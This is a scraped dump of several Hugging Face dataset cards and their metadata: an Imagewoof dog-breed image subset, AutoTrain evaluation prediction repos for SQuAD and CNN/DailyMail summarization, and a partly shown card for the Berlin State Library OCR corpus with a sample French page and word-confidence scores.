+ Annotations
+ Personal and Sensitive Information
* Considerations for Using the Data
+ Social Impact of Dataset
+ Discussion of Biases
+ Other Known Limitations
* Additional Information
+ Dataset Curators
+ Licensing Information
+ Citation Information
+ Contributions
Dataset Description
-------------------
* Homepage: URL
* Repository: URL
* Leaderboard: URL
### Dataset Summary
A smaller subset of 10 classes from Imagenet that aren't so easy to classify, since they're all dog breeds.
This dataset was created by Jeremy Howard, and this repository is only there to share his work on this platform. The repository owner takes no credit of any kind in the creation, curation or packaging of the dataset.
### Supported Tasks and Leaderboards
* 'image-classification': The dataset can be used to train a model for Image Classification.
### Languages
The class labels in the dataset are in English.
Dataset Structure
-----------------
### Data Instances
A data point comprises an image and its classification label.
### Data Fields
* 'image': A 'PIL.Image.Image' object containing the image.
* 'label': the expected class label of the image.
### Data Splits
Dataset Creation
----------------
### Curation Rationale
cf. URL
### Source Data
#### Initial Data Collection and Normalization
Imagewoof is a subset of ImageNet. Information about data collection of the source data can be found here.
### Annotations
#### Annotation process
cf. URL
#### Who are the annotators?
cf. URL
### Personal and Sensitive Information
cf. URL
Considerations for Using the Data
---------------------------------
### Social Impact of Dataset
cf. URL
### Discussion of Biases
cf. URL
### Other Known Limitations
cf. URL
Additional Information
----------------------
### Dataset Curators
cf. URL
and Jeremy Howard
### Licensing Information
Apache License 2.0.
### Contributions
This dataset was created by Jeremy Howard and published on Github. It was then only integrated into HuggingFace Datasets by @frgfm.
| [
"### Dataset Summary\n\n\nA smaller subset of 10 classes from Imagenet that aren't so easy to classify, since they're all dog breeds.\nThis dataset was created by Jeremy Howard, and this repository is only there to share his work on this platform. The repository owner takes no credit of any kind in the creation, curation or packaging of the dataset.",
"### Supported Tasks and Leaderboards\n\n\n* 'image-classification': The dataset can be used to train a model for Image Classification.",
"### Languages\n\n\nThe class labels in the dataset are in English.\n\n\nDataset Structure\n-----------------",
"### Data Instances\n\n\nA data point comprises an image URL and its classification label.",
"### Data Fields\n\n\n* 'image': A 'PIL.Image.Image' object containing the image.\n* 'label': the expected class label of the image.",
"### Data Splits\n\n\n\nDataset Creation\n----------------",
"### Curation Rationale\n\n\ncf. URL",
"### Source Data",
"#### Initial Data Collection and Normalization\n\n\nImagewoof is a subset of ImageNet. Information about data collection of the source data can be found here.",
"### Annotations",
"#### Annotation process\n\n\ncf. URL",
"#### Who are the annotators?\n\n\ncf. URL",
"### Personal and Sensitive Information\n\n\ncf. URL\n\n\nConsiderations for Using the Data\n---------------------------------",
"### Social Impact of Dataset\n\n\ncf. URL",
"### Discussion of Biases\n\n\ncf. URL",
"### Other Known Limitations\n\n\ncf. URL\n\n\nAdditional Information\n----------------------",
"### Dataset Curators\n\n\ncf. URL\nand Jeremy Howard",
"### Licensing Information\n\n\nApache License 2.0.",
"### Contributions\n\n\nThis dataset was created by Jeremy Howard and published on Github. It was then only integrated into HuggingFace Datasets by @frgfm."
] | [
"TAGS\n#task_categories-image-classification #annotations_creators-crowdsourced #language_creators-crowdsourced #size_categories-1K<n<10K #source_datasets-extended #language-English #license-apache-2.0 #region-us \n",
"### Dataset Summary\n\n\nA smaller subset of 10 classes from Imagenet that aren't so easy to classify, since they're all dog breeds.\nThis dataset was created by Jeremy Howard, and this repository is only there to share his work on this platform. The repository owner takes no credit of any kind in the creation, curation or packaging of the dataset.",
"### Supported Tasks and Leaderboards\n\n\n* 'image-classification': The dataset can be used to train a model for Image Classification.",
"### Languages\n\n\nThe class labels in the dataset are in English.\n\n\nDataset Structure\n-----------------",
"### Data Instances\n\n\nA data point comprises an image URL and its classification label.",
"### Data Fields\n\n\n* 'image': A 'PIL.Image.Image' object containing the image.\n* 'label': the expected class label of the image.",
"### Data Splits\n\n\n\nDataset Creation\n----------------",
"### Curation Rationale\n\n\ncf. URL",
"### Source Data",
"#### Initial Data Collection and Normalization\n\n\nImagewoof is a subset of ImageNet. Information about data collection of the source data can be found here.",
"### Annotations",
"#### Annotation process\n\n\ncf. URL",
"#### Who are the annotators?\n\n\ncf. URL",
"### Personal and Sensitive Information\n\n\ncf. URL\n\n\nConsiderations for Using the Data\n---------------------------------",
"### Social Impact of Dataset\n\n\ncf. URL",
"### Discussion of Biases\n\n\ncf. URL",
"### Other Known Limitations\n\n\ncf. URL\n\n\nAdditional Information\n----------------------",
"### Dataset Curators\n\n\ncf. URL\nand Jeremy Howard",
"### Licensing Information\n\n\nApache License 2.0.",
"### Contributions\n\n\nThis dataset was created by Jeremy Howard and published on Github. It was then only integrated into HuggingFace Datasets by @frgfm."
] |
a0d9ca0b1c481c4e8b2100bb6eb0457559e3f508 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: Graphcore/roberta-base-squad
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@Narayana](https://huggingface.co/Narayana) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad-47db8743-11885591 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T15:36:22+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad"], "eval_info": {"task": "extractive_question_answering", "model": "Graphcore/roberta-base-squad", "metrics": [], "dataset_name": "squad", "dataset_config": "plain_text", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T15:38:56+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: Graphcore/roberta-base-squad
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @Narayana for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: Graphcore/roberta-base-squad\n* Dataset: squad\n* Config: plain_text\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @Narayana for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: Graphcore/roberta-base-squad\n* Dataset: squad\n* Config: plain_text\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @Narayana for evaluating this model."
] |
2eb12757b146d9c1fbfda4e8f8d4a10c520de326 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: sshleifer/distilbart-cnn-12-6
* Dataset: cnn_dailymail
* Config: 3.0.0
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@nbroad](https://huggingface.co/nbroad) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-cnn_dailymail-8f63e3f3-11895592 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T16:58:47+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["cnn_dailymail"], "eval_info": {"task": "summarization", "model": "sshleifer/distilbart-cnn-12-6", "metrics": [], "dataset_name": "cnn_dailymail", "dataset_config": "3.0.0", "dataset_split": "test", "col_mapping": {"text": "article", "target": "highlights"}}} | 2022-07-26T17:52:05+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: sshleifer/distilbart-cnn-12-6
* Dataset: cnn_dailymail
* Config: 3.0.0
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @nbroad for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: sshleifer/distilbart-cnn-12-6\n* Dataset: cnn_dailymail\n* Config: 3.0.0\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @nbroad for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: sshleifer/distilbart-cnn-12-6\n* Dataset: cnn_dailymail\n* Config: 3.0.0\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @nbroad for evaluating this model."
] |
9acbc0b433d326333ebec9838d2cfd3dd96e4a6c | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: philschmid/distilbart-cnn-12-6-samsum
* Dataset: cnn_dailymail
* Config: 3.0.0
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@nbroad](https://huggingface.co/nbroad) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-cnn_dailymail-8f63e3f3-11895594 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T16:59:53+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["cnn_dailymail"], "eval_info": {"task": "summarization", "model": "philschmid/distilbart-cnn-12-6-samsum", "metrics": [], "dataset_name": "cnn_dailymail", "dataset_config": "3.0.0", "dataset_split": "test", "col_mapping": {"text": "article", "target": "highlights"}}} | 2022-07-26T17:47:15+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: philschmid/distilbart-cnn-12-6-samsum
* Dataset: cnn_dailymail
* Config: 3.0.0
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @nbroad for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: philschmid/distilbart-cnn-12-6-samsum\n* Dataset: cnn_dailymail\n* Config: 3.0.0\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @nbroad for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: philschmid/distilbart-cnn-12-6-samsum\n* Dataset: cnn_dailymail\n* Config: 3.0.0\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @nbroad for evaluating this model."
] |
09f0a5fb1b4b7bb1b18dac3c50ceeeaae00969fe | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: sshleifer/distilbart-cnn-6-6
* Dataset: cnn_dailymail
* Config: 3.0.0
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@nbroad](https://huggingface.co/nbroad) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-cnn_dailymail-8f63e3f3-11895593 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T17:01:21+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["cnn_dailymail"], "eval_info": {"task": "summarization", "model": "sshleifer/distilbart-cnn-6-6", "metrics": [], "dataset_name": "cnn_dailymail", "dataset_config": "3.0.0", "dataset_split": "test", "col_mapping": {"text": "article", "target": "highlights"}}} | 2022-07-26T17:34:27+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: sshleifer/distilbart-cnn-6-6
* Dataset: cnn_dailymail
* Config: 3.0.0
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @nbroad for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: sshleifer/distilbart-cnn-6-6\n* Dataset: cnn_dailymail\n* Config: 3.0.0\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @nbroad for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: sshleifer/distilbart-cnn-6-6\n* Dataset: cnn_dailymail\n* Config: 3.0.0\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @nbroad for evaluating this model."
] |
a890935d5bd754ddc5b85f56b6f34f6d2bb4abba |
# Dataset Card for Berlin State Library OCR data
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:**
- **Repository:**
- **Paper:**
- **Leaderboard:**
- **Point of Contact:**
### Dataset Summary
> The digital collections of the SBB contain 153,942 digitized works from the time period of 1470 to 1945.
> At the time of publication, 28,909 works have been OCR-processed resulting in 4,988,099 full-text pages.
> For each page with OCR text, the language has been determined by langid (Lui/Baldwin 2012).
### Supported Tasks and Leaderboards
- `language-modeling`: this dataset has the potential to be used for training language models on historical/OCR'd text. Since it contains OCR confidence, language and date information for many examples, it is also possible to filter this dataset to more closely match the requirements for training data, as sketched below.
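
As a concrete illustration of that kind of filtering, here is a minimal sketch using the Hugging Face `datasets` library; the language code and the mean-confidence threshold are arbitrary choices for demonstration, not recommendations.

```python
from datasets import load_dataset

dataset = load_dataset("biglam/berlin_state_library_ocr", split="train")

def high_confidence_german(example):
    # `wc` holds per-token OCR word confidences; `language` is the langid prediction.
    wc = example["wc"]
    mean_confidence = sum(wc) / len(wc) if wc else 0.0
    return example["language"] == "de" and mean_confidence >= 0.9

filtered = dataset.filter(high_confidence_german)
print(len(filtered))
```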
### Languages
The collection includes material across a large number of languages. The languages of the OCR text have been detected using [langid.py: An Off-the-shelf Language Identification Tool](https://aclanthology.org/P12-3005) (Lui & Baldwin, ACL 2012). The dataset includes a confidence score for the language prediction. **Note:** not all examples may have been successfully matched to the language prediction table from the original data.
The frequency of the top ten languages in the dataset is shown below:
| | frequency |
|----|------------------|
| de | 3.20963e+06 |
| nl | 491322 |
| en | 473496 |
| fr | 216210 |
| es | 68869 |
| lb | 33625 |
| la | 27397 |
| pl | 17458 |
| it | 16012 |
| zh | 11971 |
## Dataset Structure
### Data Instances
Each example represents a single page of OCR'd text.
A single example of the dataset is as follows:
```python
{'aut': 'Doré, Henri',
'date': '1912',
'file name': '00000218.xml',
'language': 'fr',
'language_confidence': 1.0,
'place': 'Chang-hai',
'ppn': '646426230',
'publisher': 'Imprimerie de la Mission Catholique',
'text': "— 338 — Cela fait, on enterre la statuette qu’on vient d’outrager, atten dant la réalisation sur la personne elle-même. C’est l’outrage en effigie. Un deuxième moyen, c’est de représenter l’Esprit Vengeur sous la figure d’un fier-à-bras, armé d’un sabre, ou d’une pique, et de lui confier tout le soin de sa vengeance. On multiplie les incantations et les offrandes en son honneur, pour le porter au paroxysme de la fureur, et inspirer à l’Esprit malin l’idée de l’exécution de ses désirs : en un mot, on fait tout pour faire passer en son cœur la rage de vengeance qui consume le sien propre. C’est une invention diabolique imaginée pour assouvir sa haine sur l’ennemi qu’on a en horreur. Ailleurs, ce n’est qu’une figurine en bois ou en papier, qui est lancée contre l’ennemi; elle se dissimule, ou prend des formes fantastiques pour acomplir son œuvre de vengeance. Qu’on se rappelle la panique qui régna dans la ville de Nan- king ifâ ffl, et ailleurs, l’année où de méchantes gens répandirent le bruit que des hommes de papier volaient en l’air et coupaient les tresses de cheveux des Chinois. Ce fut une véritable terreur, tous étaient affolés, et il y eut à cette occasion de vrais actes de sauvagerie. Voir historiettes sur les envoûtements : Wieger Folk-Lore, N os 50, 128, 157, 158, 159. Corollaire. Les Tao-niu jift fx ou femmes “ Tao-clie'’. A cette super stition peut se rapporter la pratique des magiciennes du Kiang- sou ■n: m, dans les environs de Chang-hai ± m, par exemple. Ces femmes portent constamment avec- elles une statue réputée merveilleuse : elle n’a que quatre ou cinq pouces de hauteur ordinairement. A force de prières, d’incantations, elles finissent par la rendre illuminée, vivante et parlante, ou plutôt piaillarde, car elle ne répond que par des petits cris aigus et répétés aux demandes qu’on lui adressé; elle paraît comme animée, sautille,",
'title': 'Les pratiques superstitieuses',
'wc': [1.0,
0.7266666889,
1.0,
0.9950000048,
0.7059999704,
0.5799999833,
0.7142857313,
0.7250000238,
0.9855555296,
0.6880000234,
0.7099999785,
0.7054545283,
1.0,
0.8125,
0.7950000167,
0.5681818128,
0.5500000119,
0.7900000215,
0.7662500143,
0.8830000162,
0.9359999895,
0.7411110997,
0.7950000167,
0.7962499857,
0.6949999928,
0.8937500119,
0.6299999952,
0.8820000291,
1.0,
0.6781818271,
0.7649999857,
0.437142849,
1.0,
1.0,
0.7416666746,
0.6474999785,
0.8166666627,
0.6825000048,
0.75,
0.7033333182,
0.7599999905,
0.7639999986,
0.7516666651,
1.0,
1.0,
0.5466666818,
0.7571428418,
0.8450000286,
1.0,
0.9350000024,
1.0,
1.0,
0.7099999785,
0.7250000238,
0.8588888645,
0.8366666436,
0.7966666818,
1.0,
0.9066666961,
0.7288888693,
1.0,
0.8333333135,
0.8787500262,
0.6949999928,
0.8849999905,
0.5816666484,
0.5899999738,
0.7922222018,
1.0,
1.0,
0.6657142639,
0.8650000095,
0.7674999833,
0.6000000238,
0.9737499952,
0.8140000105,
0.978333354,
1.0,
0.7799999714,
0.6650000215,
1.0,
0.823333323,
1.0,
0.9599999785,
0.6349999905,
1.0,
0.9599999785,
0.6025000215,
0.8525000215,
0.4875000119,
0.675999999,
0.8833333254,
0.6650000215,
0.7566666603,
0.6200000048,
0.5049999952,
0.4524999857,
1.0,
0.7711111307,
0.6666666865,
0.7128571272,
1.0,
0.8700000048,
0.6728571653,
1.0,
0.6800000072,
0.6499999762,
0.8259999752,
0.7662500143,
0.6725000143,
0.8362500072,
1.0,
0.6600000262,
0.6299999952,
0.6825000048,
0.7220000029,
1.0,
1.0,
0.6587499976,
0.6822222471,
1.0,
0.8339999914,
0.6449999809,
0.7062500119,
0.9150000215,
0.8824999928,
0.6700000167,
0.7250000238,
0.8285714388,
0.5400000215,
1.0,
0.7966666818,
0.7350000143,
0.6188889146,
0.6499999762,
1.0,
0.7459999919,
0.5799999833,
0.7480000257,
1.0,
0.9333333373,
0.790833354,
0.5550000072,
0.6700000167,
0.7766666412,
0.8280000091,
0.7250000238,
0.8669999838,
0.5899999738,
1.0,
0.7562500238,
1.0,
0.7799999714,
0.8500000238,
0.4819999933,
0.9350000024,
1.0,
0.8399999738,
0.7950000167,
1.0,
0.9474999905,
0.453333348,
0.6575000286,
0.9399999976,
0.6733333468,
0.8042857051,
0.7599999905,
1.0,
0.7355555296,
0.6499999762,
0.7118181586,
1.0,
0.621999979,
0.7200000286,
1.0,
0.853333354,
0.6650000215,
0.75,
0.7787500024,
1.0,
0.8840000033,
1.0,
0.851111114,
1.0,
0.9142857194,
1.0,
0.8899999857,
1.0,
0.9024999738,
1.0,
0.6166666746,
0.7533333302,
0.7766666412,
0.6637499928,
1.0,
0.8471428752,
0.7012500167,
0.6600000262,
0.8199999928,
1.0,
0.7766666412,
0.3899999857,
0.7960000038,
0.8050000072,
1.0,
0.8000000119,
0.7620000243,
1.0,
0.7163636088,
0.5699999928,
0.8849999905,
0.6166666746,
0.8799999952,
0.9058333039,
1.0,
0.6866666675,
0.7810000181,
0.3400000036,
0.2599999905,
0.6333333254,
0.6524999738,
0.4875000119,
0.7425000072,
0.75,
0.6863636374,
1.0,
0.8742856979,
0.137500003,
0.2099999934,
0.4199999869,
0.8216666579,
1.0,
0.7563636303,
0.3000000119,
0.8579999804,
0.6679999828,
0.7099999785,
0.7875000238,
0.9499999881,
0.5799999833,
0.9150000215,
0.6600000262,
0.8066666722,
0.729090929,
0.6999999881,
0.7400000095,
0.8066666722,
0.2866666615,
0.6700000167,
0.9225000143,
1.0,
0.7599999905,
0.75,
0.6899999976,
0.3600000143,
0.224999994,
0.5799999833,
0.8874999881,
1.0,
0.8066666722,
0.8985714316,
0.8827272654,
0.8460000157,
0.8880000114,
0.9533333182,
0.7966666818,
0.75,
0.8941666484,
1.0,
0.8450000286,
0.8666666746,
0.9533333182,
0.5883333087,
0.5799999833,
0.6549999714,
0.8600000143,
1.0,
0.7585714459,
0.7114285827,
1.0,
0.8519999981,
0.7250000238,
0.7437499762,
0.6639999747,
0.8939999938,
0.8877778053,
0.7300000191,
1.0,
0.8766666651,
0.8019999862,
0.8928571343,
1.0,
0.853333354,
0.5049999952,
0.5416666865,
0.7963636518,
0.5600000024,
0.8774999976,
0.6299999952,
0.5749999881,
0.8199999928,
0.7766666412,
1.0,
0.9850000143,
0.5674999952,
0.6240000129,
1.0,
0.9485714436,
1.0,
0.8174999952,
0.7919999957,
0.6266666651,
0.7887499928,
0.7825000286,
0.5366666913,
0.65200001,
0.832857132,
0.7488889098]}
```
### Data Fields
- `file name`: filename of the original XML file
- `text`: OCR'd text for that page of the item
- `wc`: the word confidence for each token predicted by the OCR engine
- `ppn`: 'Pica production numbers', an internal ID used by the library. See [doi:10.5281/zenodo.2702544](https://doi.org/10.5281/zenodo.2702544) for more details.
- `language`: language predicted by `langid.py` (see above for more details)
- `language_confidence`: confidence score given by `langid.py`
- `publisher`: publisher of the item in which the text appears
- `place`: place of publication of the item in which the text appears
- `date`: date of the item in which the text appears
- `title`: title of the item in which the text appears
- `aut`: author of the item in which the text appears
### Data Splits
This dataset contains only a single split `train`.
## Dataset Creation
The dataset is created from [OCR fulltexts of the Digital Collections of the Berlin State Library (DC-SBB)](https://doi.org/10.5281/zenodo.3257041) hosted on Zenodo.
### Curation Rationale
[More Information Needed]
### Source Data
#### Initial Data Collection and Normalization
The dataset is created from [OCR fulltexts of the Digital Collections of the Berlin State Library (DC-SBB)](https://doi.org/10.5281/zenodo.3257041) hosted on Zenodo. This dataset includes text content produced through running Optical Character Recognition across 153,942 digitized works held by the Berlin State Library.
The [dataprep.ipynb](https://huggingface.co/datasets/biglam/berlin_state_library_ocr/blob/main/dataprep.ipynb) notebook was used to create this dataset.
To make the dataset more useful for training language models, the following steps were carried out:
- the CSV `xml2csv_alto.csv`, which contains the full-text corpus per document page (incl. OCR word confidences), was loaded using the `datasets` library
- this CSV was augmented with language information from `corpus-language.pkl`. **Note:** some examples have no match in this table; sometimes this is because a page is blank, but some pages with actual text may also be missing predicted language information
- the CSV was further augmented by trying to map the PPN to fields in a metadata download created using [https://github.com/elektrobohemian/StabiHacks/blob/master/oai-analyzer/oai-analyzer.py](https://github.com/elektrobohemian/StabiHacks/blob/master/oai-analyzer/oai-analyzer.py). **Note:** not all examples are successfully matched to this metadata download. A rough sketch of these augmentation steps follows below.
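
For illustration only, a rough sketch of the augmentation steps is given below. The join key (`ppn`) and the shape of the pickle file are assumptions made for this example; the `dataprep.ipynb` notebook linked above is the authoritative reference.

```python
import pandas as pd

# Per-page full texts with OCR word confidences (one row per document page).
pages = pd.read_csv("xml2csv_alto.csv")

# Per-page language predictions produced by langid.py.
languages = pd.read_pickle("corpus-language.pkl")

# Assumption: both tables share a PPN-based key; the real notebook may join
# on a different or composite key (e.g. PPN plus page file name).
augmented = pages.merge(languages, how="left", on="ppn")
```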
#### Who are the source language producers?
[More Information Needed]
### Annotations
#### Annotation process
This dataset contains machine-produced annotations for:
- the confidence scores the OCR engines used to produce the full-text materials.
- the predicted languages and associated confidence scores produced by `langid.py`
The dataset also contains metadata for the following fields:
- author
- publisher
- the place of publication
- title
#### Who are the annotators?
[More Information Needed]
### Personal and Sensitive Information
This dataset contains historical material, potentially including names, addresses etc., but these are not likely to refer to living individuals.
## Considerations for Using the Data
### Social Impact of Dataset
[More Information Needed]
### Discussion of Biases
As with any historical material, the views and attitudes expressed in some texts will likely diverge from contemporary beliefs. One should consider carefully how this potential bias may become reflected in language models trained on this data.
### Other Known Limitations
[More Information Needed]
## Additional Information
### Dataset Curators
Initial data created by: Labusch, Kai; Zellhöfer, David
### Licensing Information
[Creative Commons Attribution 4.0 International](https://creativecommons.org/licenses/by/4.0/legalcode)
### Citation Information
```
@dataset{labusch_kai_2019_3257041,
author = {Labusch, Kai and
Zellhöfer, David},
title = {{OCR fulltexts of the Digital Collections of the
Berlin State Library (DC-SBB)}},
month = jun,
year = 2019,
publisher = {Zenodo},
version = {1.0},
doi = {10.5281/zenodo.3257041},
url = {https://doi.org/10.5281/zenodo.3257041}
}
```
### Contributions
Thanks to [@davanstrien](https://github.com/davanstrien) for adding this dataset.
| biglam/berlin_state_library_ocr | [
"task_categories:fill-mask",
"task_categories:text-generation",
"task_ids:masked-language-modeling",
"task_ids:language-modeling",
"annotations_creators:machine-generated",
"language_creators:expert-generated",
"multilinguality:multilingual",
"size_categories:1M<n<10M",
"language:de",
"language:nl",
"language:en",
"language:fr",
"language:es",
"license:cc-by-4.0",
"ocr",
"library",
"region:us"
] | 2022-07-26T18:40:02+00:00 | {"annotations_creators": ["machine-generated"], "language_creators": ["expert-generated"], "language": ["de", "nl", "en", "fr", "es"], "license": ["cc-by-4.0"], "multilinguality": ["multilingual"], "size_categories": ["1M<n<10M"], "source_datasets": [], "task_categories": ["fill-mask", "text-generation"], "task_ids": ["masked-language-modeling", "language-modeling"], "pretty_name": "Berlin State Library OCR", "tags": ["ocr", "library"]} | 2022-08-05T08:36:24+00:00 | [] | [
"de",
"nl",
"en",
"fr",
"es"
] | TAGS
#task_categories-fill-mask #task_categories-text-generation #task_ids-masked-language-modeling #task_ids-language-modeling #annotations_creators-machine-generated #language_creators-expert-generated #multilinguality-multilingual #size_categories-1M<n<10M #language-German #language-Dutch #language-English #language-French #language-Spanish #license-cc-by-4.0 #ocr #library #region-us
| Dataset Card for Berlin State Library OCR data
==============================================
Table of Contents
-----------------
* Table of Contents
* Dataset Description
+ Dataset Summary
+ Supported Tasks and Leaderboards
+ Languages
* Dataset Structure
+ Data Instances
+ Data Fields
+ Data Splits
* Dataset Creation
+ Curation Rationale
+ Source Data
+ Annotations
+ Personal and Sensitive Information
* Considerations for Using the Data
+ Social Impact of Dataset
+ Discussion of Biases
+ Other Known Limitations
* Additional Information
+ Dataset Curators
+ Licensing Information
+ Citation Information
+ Contributions
Dataset Description
-------------------
* Homepage:
* Repository:
* Paper:
* Leaderboard:
* Point of Contact:
### Dataset Summary
>
> The digital collections of the SBB contain 153,942 digitized works from the time period of 1470 to 1945.
>
>
>
>
> At the time of publication, 28,909 works have been OCR-processed resulting in 4,988,099 full-text pages.
> For each page with OCR text, the language has been determined by langid (Lui/Baldwin 2012).
>
>
>
### Supported Tasks and Leaderboards
* 'language-modeling': this dataset has the potential to be used for training language models on historical/OCR'd text. Since it contains OCR confidence, language and date information for many examples, it is also possible to filter this dataset to more closely match the requirements for training data.
### Languages
The collection includes material across a large number of languages. The languages of the OCR text have been detected using URL: An Off-the-shelf Language Identification Tool (Lui & Baldwin, ACL 2012). The dataset includes a confidence score for the language prediction. Note: not all examples may have been successfully matched to the language prediction table from the original data.
The frequency of the top ten languages in the dataset is shown below:
Dataset Structure
-----------------
### Data Instances
Each example represents a single page of OCR'd text.
A single example of the dataset is as follows:
### Data Fields
* 'file name': filename of the original XML file
* 'text': OCR'd text for that page of the item
* 'wc': the word confidence for each token predicted by the OCR engine
* 'ppn': 'Pica production numbers', an internal ID used by the library. See URL for more details.
* 'language': language predicted by 'URL' (see above for more details)
* 'language\_confidence': confidence score given by 'URL'
* publisher: publisher of the item in which the text appears
* place: place of publication of the item in which the text appears
* date: date of the item in which the text appears
* title: title of the item in which the text appears
* aut: author of the item in which the text appears
### Data Splits
This dataset contains only a single split 'train'.
Dataset Creation
----------------
The dataset is created from OCR fulltexts of the Digital Collections of the Berlin State Library (DC-SBB) hosted on Zenodo.
### Curation Rationale
### Source Data
#### Initial Data Collection and Normalization
The dataset is created from OCR fulltexts of the Digital Collections of the Berlin State Library (DC-SBB) hosted on Zenodo. This dataset includes text content produced through running Optical Character Recognition across 153,942 digitized works held by the Berlin State Library.
The URL was used to create this dataset.
To make the dataset more useful for training language models, the following steps were carried out:
